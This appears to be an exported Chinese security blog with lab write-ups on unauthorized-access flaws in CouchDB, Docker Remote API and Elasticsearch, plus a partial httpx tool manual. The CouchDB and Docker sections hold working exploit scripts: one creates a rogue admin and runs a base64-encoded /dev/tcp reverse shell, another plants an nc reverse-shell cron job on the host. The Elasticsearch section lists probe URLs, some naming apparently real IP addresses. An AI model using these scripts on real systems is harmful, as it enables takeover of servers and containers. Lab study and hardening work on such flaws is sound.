<div class="note purple icon-padding flat"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline purple"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>05-17</p>
</div></div><div class='timeline-item-content'><h1 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h1><p>Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。</p>
<p>CouchDB 默认在 5984 端口开放 Restful 的 API 接口，用于数据库的管理功能。其 HTTP Server 默认开启时没有进行验证，而且绑定在0.0.0.0，所有用户均可通过 API 访问导致未授权访问。任何连接到服务器端口上的人，都可以调用相关 API 对服务器上的数据进行任意的增删改查，其中通过 API 修改 local.ini 配置文件，可进一步导致执行任意系统命令，获取服务器权限！</p>
<h1 id="漏洞环境"><a href="#漏洞环境" class="headerlink" title="漏洞环境"></a>漏洞环境</h1><p>使用 vulhub 搭建</p>
<p>启动完成后，访问<code>http://your-ip:5984/</code>即可看到Couchdb的欢迎页面。</p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><h3 id="Couchdb-垂直权限绕过漏洞（CVE-2017-12635）"><a href="#Couchdb-垂直权限绕过漏洞（CVE-2017-12635）" class="headerlink" title="Couchdb 垂直权限绕过漏洞（CVE-2017-12635）"></a><strong>Couchdb 垂直权限绕过漏洞（CVE-2017-12635）</strong></h3><p>任意用户创建</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">数据包中发送两个 roles 数据包，可绕过限制，建立用户</span><br><span class="line">PUT /_users/org.couchdb.user:vulhub HTTP/1.1</span><br><span class="line">Host: your-ip:5984</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Language: en</span><br><span class="line">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/json</span><br><span class="line">Content-Length: 108</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  <span class="string">&quot;type&quot;</span>: <span class="string">&quot;user&quot;</span>,</span><br><span class="line">  <span class="string">&quot;name&quot;</span>: <span class="string">&quot;vulhub&quot;</span>,</span><br><span class="line">  <span class="string">&quot;roles&quot;</span>: [<span class="string">&quot;_admin&quot;</span>],</span><br><span class="line">  <span class="string">&quot;roles&quot;</span>: [],</span><br><span class="line">  <span class="string">&quot;password&quot;</span>: <span class="string">&quot;vulhub&quot;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Couchdb-任意命令执行漏洞（CVE-2017-12636）"><a href="#Couchdb-任意命令执行漏洞（CVE-2017-12636）" class="headerlink" title="Couchdb 任意命令执行漏洞（CVE-2017-12636）"></a><strong>Couchdb 任意命令执行漏洞（CVE-2017-12636）</strong></h3><p>在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12636是一个任意命令执行漏洞，我们可以通过config api修改couchdb的配置<code>query_server</code>，这个配置项在设计、执行view的时候将被运行。</p>
<p><strong>利用条件</strong></p>
<p>影响版本：小于 1.7.0 以及 小于 2.1.1</p>
<p>该漏洞是需要登录用户方可触发，如果不知道目标管理员密码，可以利用<a href="https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635">CVE-2017-12635</a>先增加一个管理员用户。</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">利用方式</span><br><span class="line">使用msf模块：linux/http/apache_couchdb_cmd_exec</span><br><span class="line"></span><br><span class="line">poc 代码</span><br><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line">import requests</span><br><span class="line">import json</span><br><span class="line">import <span class="built_in">base64</span></span><br><span class="line">from requests.auth import HTTPBasicAuth</span><br><span class="line"></span><br><span class="line">target = <span class="string">&#x27;http://your-ip/:5984&#x27;</span></span><br><span class="line"><span class="built_in">command</span> = rb<span class="string">&quot;&quot;</span><span class="string">&quot;sh -i &gt;&amp; /dev/tcp/10.0.0.1/443 0&gt;&amp;1&quot;</span><span class="string">&quot;&quot;</span></span><br><span class="line">version = 1</span><br><span class="line"></span><br><span class="line">session = requests.session()</span><br><span class="line">session.headers = &#123;</span><br><span class="line">    <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment"># session.proxies = &#123;</span></span><br><span class="line"><span class="comment">#     &#x27;http&#x27;: &#x27;http://127.0.0.1:8085&#x27;</span></span><br><span class="line"><span class="comment"># &#125;</span></span><br><span class="line">session.put(target + <span class="string">&#x27;/_users/org.couchdb.user:wooyun&#x27;</span>, data=<span class="string">&#x27;&#x27;</span><span class="string">&#x27;&#123;</span></span><br><span class="line"><span class="string">  &quot;type&quot;: &quot;user&quot;,</span></span><br><span class="line"><span class="string">  &quot;name&quot;: &quot;wooyun&quot;,</span></span><br><span class="line"><span class="string">  &quot;roles&quot;: [&quot;_admin&quot;],</span></span><br><span class="line"><span class="string">  &quot;roles&quot;: [],</span></span><br><span class="line"><span class="string">  &quot;password&quot;: &quot;wooyun&quot;</span></span><br><span class="line"><span class="string">&#125;&#x27;</span><span class="string">&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">session.auth = HTTPBasicAuth(<span class="string">&#x27;wooyun&#x27;</span>, <span class="string">&#x27;wooyun&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">command</span> = <span class="string">&quot;bash -c &#x27;&#123;echo,%s&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&#x27;&quot;</span> % base64.b64encode(<span class="built_in">command</span>).decode()</span><br><span class="line"><span class="keyword">if</span> version == 1:</span><br><span class="line">    session.put(target + (<span class="string">&#x27;/_config/query_servers/cmd&#x27;</span>), data=json.dumps(<span class="built_in">command</span>))</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    host = session.get(target + <span class="string">&#x27;/_membership&#x27;</span>).json()[<span class="string">&#x27;all_nodes&#x27;</span>][0]</span><br><span class="line">    session.put(target + <span class="string">&#x27;/_node/&#123;&#125;/_config/query_servers/cmd&#x27;</span>.format(host), data=json.dumps(<span class="built_in">command</span>))</span><br><span class="line"></span><br><span class="line">session.put(target + <span class="string">&#x27;/wooyun&#x27;</span>)</span><br><span class="line">session.put(target + <span class="string">&#x27;/wooyun/test&#x27;</span>, data=<span class="string">&#x27;&#123;&quot;_id&quot;: &quot;wooyuntest&quot;&#125;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> version == 1:</span><br><span class="line">    session.post(target + <span class="string">&#x27;/wooyun/_temp_view?limit=10&#x27;</span>, data=<span class="string">&#x27;&#123;&quot;language&quot;:&quot;cmd&quot;,&quot;map&quot;:&quot;&quot;&#125;&#x27;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    session.put(target + <span class="string">&#x27;/wooyun/_design/test&#x27;</span>, data=<span class="string">&#x27;&#123;&quot;_id&quot;:&quot;_design/test&quot;,&quot;views&quot;:&#123;&quot;wooyun&quot;:&#123;&quot;map&quot;:&quot;&quot;&#125; &#125;,&quot;language&quot;:&quot;cmd&quot;&#125;&#x27;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="漏洞加固"><a href="#漏洞加固" class="headerlink" title="漏洞加固"></a>漏洞加固</h1><ul>
<li>指定CouchDB绑定的IP （需要重启CouchDB才能生效） 在 &#x2F;etc&#x2F;couchdb&#x2F;local.ini 文件中找到 “bind_address &#x3D; 0.0.0.0” ，把 0.0.0.0 修改为 127.0.0.1 ，然后保存。注：修改后只有本机才能访问CouchDB。</li>
<li>设置访问密码 （需要重启CouchDB才能生效） 在 &#x2F;etc&#x2F;couchdb&#x2F;local.ini 中找到“[admins]”字段配置密码</li>
</ul>
<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><ul>
<li><a href="https://paper.seebug.org/409/#0x09-couchdb">https://paper.seebug.org/409/#0x09-couchdb</a></li>
<li><a href="https://vulhub.org/#/environments/couchdb/CVE-2017-12636/">https://vulhub.org/#/environments/couchdb/CVE-2017-12636/</a></li>
</ul>
</div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>未授权访问</category>
        <category>Couchdb</category>
      </categories>
      <tags>
        <tag>Couchdb</tag>
      </tags>
  </entry>
  <entry>
    <title>Docker 未授权访问</title>
    <url>/2023/05/18/Docker/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>奇奇怪怪</p>
</div>

<div class="note orange icon-padding flat"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding flat"><i class="note-icon fas fa-bullhorn"></i><p>新的一天开始了</p>
</div>

<div class="note purple icon-padding flat"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline red"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>05-18</p>
</div></div><div class='timeline-item-content'><h1 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h1><ul>
<li>Docker Remote API 是一个取代远程命令行界面（rcli）的REST API。通过 docker client 或者 http 直接请求就可以访问这个 API，通过这个接口，我们可以新建 container，删除已有 container，甚至是获取宿主机的 shell</li>
</ul>
<h1 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h1><ul>
<li>vulhub靶场环境</li>
<li>docker-compose build<br>docker-compose up -d</li>
<li>环境启动后，将监听2375端口。</li>
<li>测试多个环境启动失败，最后使用官方靶场推荐环境，ubuntu20.04 正常启动</li>
</ul>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">http://xxx:2375/version  查看版本信息</span><br><span class="line">http://xxx:2375/info  查看info信息</span><br><span class="line">http://host:2375/containers/json 当前服务器运行容器列表信息</span><br><span class="line"></span><br><span class="line">使用命令远程连接目标执行docker 指令</span><br><span class="line">docker -H tcp://xxx:2375 images 返回远程目标的 images 信息，也可以执行其他docker命令</span><br><span class="line"></span><br><span class="line">**获取宿主机权限**</span><br><span class="line"></span><br><span class="line">远程命令运行容器并且使用 -v 参数将宿主机 /root 目录挂载到容器 /mnt/setc 目录</span><br><span class="line">随后可以将生成 ssh 公钥私钥，将公钥写入目标 /root/.ssh/authorized_keys 文件</span><br><span class="line">随后使用私钥登陆</span><br><span class="line">docker -H tcp://192.168.56.117:2375 run -it -v /root:/mnt/setc alpine:latest /bin/sh</span><br><span class="line"></span><br><span class="line">远程命令运行容器使用 -v 参数将宿主机 /etc 目录挂载到容器 /mnt/setc 目录</span><br><span class="line">随后写入定时任务命令反弹shell</span><br><span class="line">/etc/crontab   ,也可以挂载 /var/spool/cron/ 写入定时任务反弹shell</span><br><span class="line">docker -H tcp://192.168.56.117:2375 run -it -v /etc:/mnt/setc alpine:latest /bin/sh</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">py poc 代码</span><br><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line">import docker</span><br><span class="line"></span><br><span class="line">client = docker.DockerClient(base_url=<span class="string">&#x27;http://192.168.56.117:2375/&#x27;</span>)</span><br><span class="line">data = client.containers.run(<span class="string">&#x27;alpine:latest&#x27;</span>, r<span class="string">&#x27;&#x27;</span><span class="string">&#x27;sh -c &quot;echo &#x27;</span>* * * * * /usr/bin/nc 192.168.56.1 1111 -e /bin/sh<span class="string">&#x27; &gt;&gt; /tmp/etc/crontabs/root&quot; &#x27;</span><span class="string">&#x27;&#x27;</span>, remove=True, volumes=&#123;<span class="string">&#x27;/etc&#x27;</span>: &#123;<span class="string">&#x27;bind&#x27;</span>: <span class="string">&#x27;/tmp/etc&#x27;</span>, <span class="string">&#x27;mode&#x27;</span>: <span class="string">&#x27;rw&#x27;</span>&#125;&#125;)</span><br></pre></td></tr></table></figure>

<h1 id="漏洞加固"><a href="#漏洞加固" class="headerlink" title="漏洞加固"></a>漏洞加固</h1><ul>
<li>在不必需的情况下，不要启用 docker 的 remote api 服务，如果必须使用的话，可以采用如下的加固方式：</li>
<li>设置 ACL，仅允许信任的来源 IP 连接；</li>
<li>设置 TLS 认证，官方的文档为 Protect the Docker daemon socket</li>
<li>客户端连接时需要设置以下环境变量 export DOCKER_TLS_VERIFY&#x3D;1</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">export DOCKER_CERT_PATH=~/.docker</span><br><span class="line">export DOCKER_HOST=tcp://10.10.10.10:2375</span><br><span class="line">export DOCKER_API_VERSION=1.12</span><br></pre></td></tr></table></figure>

<ul>
<li>在 docker api 服务器前面加一个代理，例如 nginx，设置 401 认证</li>
</ul>
<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><ul>
<li><a href="https://paper.seebug.org/409/#0x010-docker">https://paper.seebug.org/409/#0x010-docker</a></li>
<li><a href="https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.zh-cn.md">https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.zh-cn.md</a></li>
<li><a href="https://0a00.github.io/2022/11/26/docker1/">https://0a00.github.io/2022/11/26/docker1/</a></li>
</ul>
</div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>未授权访问</category>
        <category>Docker</category>
      </categories>
      <tags>
        <tag>Docker</tag>
      </tags>
  </entry>
  <entry>
    <title>ElasticSearch 未授权访问</title>
    <url>/2023/05/16/ElasticSearch/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>方糖的博客</p>
</div>

<div class="note orange icon-padding flat"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding flat"><i class="note-icon fas fa-bullhorn"></i><p>新的一年快到了….</p>
</div>

<div class="note purple icon-padding flat"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline pink"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>05-16</p>
</div></div><div class='timeline-item-content'><h1 id="漏洞介绍"><a href="#漏洞介绍" class="headerlink" title="漏洞介绍"></a>漏洞介绍</h1><p>Elasticsearch 是一款 java 编写的企业级搜索服务。越来越多的公司使用 ELK 作为日志分析，启动此服务默认会开放9200端口，可被非法操作数据。</p>
<p>漏洞检测：默认端口9200</p>
<p>相当于一个API，任何人访问这个地址，就可以调用api，进行数据的增删改操作。</p>
<p>返回内容中包含”You Know, for Search”</p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">利用接口</span><br><span class="line">http://x.x.x.x:9200/_nodes</span><br><span class="line">http://x.x.x.x:9200/_river</span><br><span class="line">http://101.198.161.130:9200/_cat/indices/</span><br><span class="line">http://101.198.161.130:9200/_plugin/head/</span><br><span class="line">http://101.198.161.130:9200/_nodes?prettify</span><br><span class="line">http://101.198.161.130:9200/_status</span><br><span class="line">http://101.198.161.130:9200/_search?pretty</span><br><span class="line">http://10.203.9.131:9200/zjftu/</span><br><span class="line">http://10.203.9.131:9200/zjftu/_search?pretty</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>修复方案</h1><ul>
<li>关闭9200端口</li>
<li>防火墙规则限制禁止外网访问端口</li>
<li>设置端口账号认证</li>
</ul>
<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><p><a href="http://blkstone.github.io/2017/09/27/elasticsearch-unauthorized-access/">http://blkstone.github.io/2017/09/27/elasticsearch-unauthorized-access/</a></p>
<p><a href="http://blkstone.github.io/2017/09/27/elasticsearch-unauthorized-access/">http://blkstone.github.io/2017/09/27/elasticsearch-unauthorized-access/</a></p>
</div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>未授权访问</category>
        <category>ElasticSearch</category>
      </categories>
      <tags>
        <tag>ElasticSearch</tag>
      </tags>
  </entry>
  <entry>
    <title>HTTPX-参考手册</title>
    <url>/2023/11/26/HTTPX-Reference/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>奇奇怪怪</p>
</div>

<div class="note orange icon-padding flat"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding flat"><i class="note-icon fas fa-bullhorn"></i><p>新的一天开始了</p>
</div>

<div class="note purple icon-padding flat"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline green"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>11-26</p>
</div></div><div class='timeline-item-content'><p>永远新的开始啊</p>
<aside>
💡 **目录列表**

</aside>

<hr>
<h1 id="💢-简介"><a href="#💢-简介" class="headerlink" title="💢 简介"></a>💢 简介</h1><blockquote>
<p><code>httpx</code> 是一个快速且多用途的HTTP工具包，允许使用retryablehttp库运行多个探测器。它旨在通过增加线程数量来保持结果的可靠性。</p>
</blockquote>
<h2 id="功能-🤪"><a href="#功能-🤪" class="headerlink" title="功能 🤪"></a>功能 🤪</h2><ul>
<li>发送 GET、POST、PUT、DELETE 等 HTTP 请求</li>
<li>支持流式传输</li>
<li>支持重定向</li>
<li>支持身份验证</li>
<li>支持代理</li>
<li>支持 cookie</li>
<li>支持 TLS</li>
</ul>
<h2 id="安全领域-🧐"><a href="#安全领域-🧐" class="headerlink" title="安全领域 🧐"></a>安全领域 🧐</h2><ul>
<li>漏洞扫描</li>
<li>渗透测试</li>
<li>安全研究</li>
<li>网络安全监控</li>
<li>Web 应用防火墙</li>
</ul>
<h2 id="安装方式-😤"><a href="#安装方式-😤" class="headerlink" title="安装方式 😤"></a>安装方式 😤</h2><blockquote>
<p><code>go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest</code></p>
</blockquote>
<h1 id="😖-参数详解"><a href="#😖-参数详解" class="headerlink" title="😖 参数详解"></a>😖 参数详解</h1><h3 id="目标指定-🤐"><a href="#目标指定-🤐" class="headerlink" title="目标指定 🤐"></a><strong><strong><strong><strong><strong><strong><strong><strong><strong>目标指定</strong></strong></strong></strong></strong></strong></strong></strong></strong> 🤐</h3><ul>
<li><code>-l， -list string</code>主机列表的文件</li>
<li><code>-rr，</code> -<code>request</code>   字符串文件包含原始请求</li>
<li><code>-u，</code>要探测的主机ip，域名，逗号分割多个目标</li>
</ul>
<h3 id="探测功能-🤩"><a href="#探测功能-🤩" class="headerlink" title="探测功能 🤩"></a><strong><strong><strong><strong><strong><strong><strong>探测功能</strong></strong></strong></strong></strong></strong></strong> 🤩</h3><ul>
<li><code>-sc</code> ， 显示响应状态代码</li>
<li><code>-cl</code> ， 显示响应内容长度</li>
<li><code>-ct</code> ， 显示响应内容类型</li>
<li><code>-location</code> ， 显示响应重定向位置</li>
<li><code>-favicon</code> ， 显示&#x2F;favicon.ico文件的mmh3散列</li>
<li><code>-hash md5</code> ， 显示响应体哈希值(支持:<code>md5,mmh3,simhash,sha1,sha256,sha512</code>)</li>
<li><code>-jarm</code> ， 显示jarm指纹散列</li>
<li><code>-rt</code>， 显示响应时间</li>
<li><code>-lc，</code> 显示响应体行数</li>
<li><code>-wc</code>， 显示响应正文字数</li>
<li><code>-title</code> ， 显示页面标题</li>
<li><code>-bp=1， -body-preview</code> 显示响应体的前N个字符(默认为100)</li>
<li><code>-server， -web-server</code> 显示服务器名</li>
<li><code>-td、-tech-detect</code> ， 显示wappalyzer数据集上的服务应用</li>
<li><code>-method</code> ， 显示HTTP请求方法</li>
<li><code>-websocket</code> ， 显示服务器使用websocket</li>
<li><code>-ip</code> 显示目标主机IP</li>
<li><code>-cname</code>  ，显示主机的cname</li>
<li><code>-asn</code> ， 显示主机的asn信息</li>
<li><code>-cdn</code> ， 显示使用的cdn ，waf</li>
<li><code>-probe</code> ， 显示探针状态</li>
</ul>
<h3 id="无头测试-👏"><a href="#无头测试-👏" class="headerlink" title="无头测试 👏"></a><strong><strong><strong><strong><strong>无头测试</strong></strong></strong></strong></strong> 👏</h3><ul>
<li><code>-ss， -screen</code> 启用使用无头浏览器保存页面截图</li>
<li><code>-system-chrome</code> 启用使用本地安装的chrome屏幕截图</li>
<li><code>-esb， -exclude-screen - shots -bytes</code>  启用从json输出中排除截图字节</li>
<li><code>-ehb， -exclude-headless-body</code>  启用从json输出中排除headless header</li>
</ul>
<h3 id="参数匹配-😮‍💨"><a href="#参数匹配-😮‍💨" class="headerlink" title="参数匹配 😮‍💨"></a>参数匹配 😮‍💨</h3><ul>
<li><code>-mc, -match-code string</code>   匹配响应与指定的状态码(-mc 200,302)</li>
<li><code>-ml， -match-length</code> 字符串匹配指定内容长度的响应(-ml 100,102,0)</li>
<li><code>-mlc，-match-line-count string</code> 匹配具有指定行数的响应体(-mlc 423,532)</li>
<li><code>-mwc， -match-word-count string</code> 根据指定的字数匹配响应体(-mwc 43,55)</li>
<li><code>-mfc， -match-favicon string</code> 匹配响应与指定的favicon哈希(-mfc 1494302000)</li>
<li><code>-ms， -match-string string</code> 与指定字符串进行页面内容与标题匹配(-ms admin)</li>
<li><code>-mcdn， -match-cdn string</code>   匹配是否为指定CDN提供商(cloudfront, fastly, google, leaseweb, stackpath)</li>
<li><code>-mrt， -match-response-time string</code>  以秒为单位匹配具有指定响应时间的响应(-mrt ‘&lt; 1s’)</li>
<li><code>-mdc， -match-condition string</code>  使用DSL表达式条件匹配响应</li>
</ul>
<h3 id="响应提取-🫠"><a href="#响应提取-🫠" class="headerlink" title="响应提取 🫠"></a>响应提取 🫠</h3><ul>
<li><code>-er， -extract-regex string[]</code>  显示匹配正则的响应内容（-er “<title>(.*?)</title>”）</li>
<li><code>-ep， -extract-preset string[]</code>   显示与预定义正则表达式(ipv4,mail,url)匹配的响应内容</li>
</ul>
<h3 id="过滤参数-🤗"><a href="#过滤参数-🤗" class="headerlink" title="过滤参数 🤗"></a>过滤参数 🤗</h3><ul>
<li><code>-fc， -filter-code string</code>   排除目标，指定状态码过滤掉响应，排除掉403,401响应 (-fc 403,401)</li>
<li><code>-fep， -filter-error-page</code>  过滤响应，基于ML的错误页面检测</li>
<li><code>-fl， -filter-length string</code>  过滤指定内容长度的响应(-fl 23,33)</li>
<li><code>-flc, -filter-line-count string</code> , 过滤带有指定行数的响应体(-flc 423,532)</li>
<li><code>-fwc， -filter-word-count string</code>   过滤指定字数的响应体(-fwc 423,532)</li>
<li><code>-ffc， -filter-favicon string[]</code>   使用指定的favicon哈希值过滤响应(-ffc 1494302000)</li>
<li><code>-fs， -filter-string</code>  指定字符串过滤响应(-fs admin)</li>
<li><code>-fe, -filter-regex string</code> , 使用指定的正则表达式过滤响应(-fe admin 302  200 )</li>
<li><code>-fcdn， -filter-cdn string</code>   过滤指定CDN提供商的主机(cloudfront, fastly，google，leaseweb, stackpath)</li>
<li><code>-frt, -filter-response-time string</code> , 过滤响应，指定响应时间为秒(- first ‘&gt; 1’)</li>
<li><code>-fdc， -filter-condition string</code>  过滤带有DSL表达式条件的响应</li>
<li><code>-strip html</code> ,   删除响应中的所有标签。支持的格式:html,xml(默认html)-strip&#x3D;html</li>
</ul>
<h3 id="速率控制-🤣"><a href="#速率控制-🤣" class="headerlink" title="速率控制 🤣"></a>速率控制 🤣</h3><ul>
<li><code>-t， -threads int</code>    要使用的线程数(默认50)</li>
<li><code>-rl， -rate-limit int</code>   每秒发送的最大请求数(默认为150)</li>
<li><code>-rlm， -rate-limit-minute</code> int每分钟发送的最大请求数</li>
</ul>
<h3 id="杂项-☹️"><a href="#杂项-☹️" class="headerlink" title="杂项 ☹️"></a>杂项 ☹️</h3><ul>
<li><code>-pa， -probe-all-ips</code>  探测与同一主机关联的所有ip ，一个主机名（域名）可能绑定多个 ip 地址</li>
<li><code>-p， -ports string[]</code>  要探测的端口(nmap语法:例如http:1,2-10,11,https:80以及  -ports http:443,http:80,https:8443)</li>
<li><code>-path string</code>要探测的路径或路径列表(逗号分隔，file)   可指定字符，也可文件，可用于模糊测试</li>
<li><code>-tls-probe</code> , 在提取的 TLS 域（传输层安全协议中使用的域名）上发送 http 探测(dns _ name)</li>
<li><code>-csp-probe</code> ， 在提取的csp域上发送http探测</li>
<li><code>-tls-grab</code> ， 执行 TLS (SSL)数据抓取</li>
<li><code>-pipeline</code> ，支持HTTP1.1管道的探测和显示服务器</li>
<li><code>-http2</code> ， 支持HTTP2的探测和显示服务器</li>
<li><code>-vhost</code> ， 支持虚拟主机探测</li>
<li><code>-ldv</code>   ， 显示内置的匹配表达式</li>
</ul>
<h3 id="更新-😢"><a href="#更新-😢" class="headerlink" title="更新 😢"></a>更新 😢</h3><ul>
<li><code>-up</code>  ，更新 httpx程序</li>
<li><code>-duc</code> ， 禁用更新检测</li>
</ul>
<h3 id="输出-🧰"><a href="#输出-🧰" class="headerlink" title="输出 🧰"></a>输出 🧰</h3><ul>
<li><code>-o</code> 指定输出文件</li>
<li><code>-oa</code> 以所有格式写入输出结果（默认，csv，json），需要先指定 -o</li>
<li><code>-sr</code>, -store-response , 将http响应存储到输出目录</li>
<li><code>-srd</code>, -store-response-dir string   将 http 响应存储到自定义目录</li>
<li><code>-csv</code> ， 以 csv 格式存储输出</li>
<li><code>-csvo, -csv-output-encoding string</code> ， 定义输出编码</li>
<li><code>-j, -json</code> ， 以JSONL（ines）格式存储输出</li>
<li><code>-irh, -include-response-header</code>，在JSON输出中包含http响应（标头）（仅限-JSON）</li>
<li><code>-irr, -include-response</code>，在JSON输出中包含http请求&#x2F;响应（头+正文）（仅限-JSON）</li>
<li><code>-irrb, -include-response-base64</code> ，在JSON输出中包含base64编码的http请求&#x2F;响应（仅限-JSON）</li>
<li><code>-include-chain</code>，在JSON输出中包括重定向HTTP链（仅-JSON）</li>
<li><code>-svrc</code>，包括视觉侦察集群（仅限-ss和-sr）</li>
</ul>
<h3 id="配置-🤨"><a href="#配置-🤨" class="headerlink" title="配置 🤨"></a>配置 🤨</h3><ul>
<li><code>-config string</code>  , 配置文件的config字符串路径（默认为$HOME&#x2F;.config&#x2F;httpx&#x2F;config.yaml）</li>
<li><code>-r, -resolvers string[]</code> , 自定义 dns 解析器列表(文件或逗号分隔)（  <strong>doh|tcp|udp</strong>  ），形式为 <code>protocol:resolver:port</code>（例如 <code>udp:127.0.0.1:53</code>)</li>
<li><code>-allow string[]</code> , 允许处理的IP&#x2F;CIDR列表（以文件或逗号分隔，ip地址，不能域名)</li>
<li><code>-deny string[]</code>  , 拒绝处理的IP&#x2F;CIDR列表（以文件或逗号分隔，ip地址，不能域名)</li>
<li><code>-sni, -sni-name string</code>， 自定义TLS SNI名称（TLS握手过程中指定要连接的主机名或域名）</li>
<li><code>-random-agent</code>，启用随机 user-agent 使用（默认为true）</li>
<li><code>-H, -header string[]</code>，自定义的HTTP标头发送请求</li>
<li><code>-http-proxy, -proxy string</code> ， 使用 http 代理服务器(例如 <a href="http://127.0.0.1:8080/">http://127.0.0.1:8080</a>)</li>
<li><code>-unsafe</code> ，发送跳过 Golang 标准化的原始请求，（可能会有得到更多相关的链接）</li>
<li><code>-resume</code> ，使用 resume.cfg 恢复扫描</li>
<li><code>-fr, -follow-redirects</code> ，跟随 http 重定向</li>
<li><code>-maxr， -max-redirects</code> int每个主机的最大重定向数(默认为10)，部分网站需要大量的重定向才能访问成功</li>
<li><code>-fhr， -follow-host-redirects</code>  跟踪同一主机上的重定向</li>
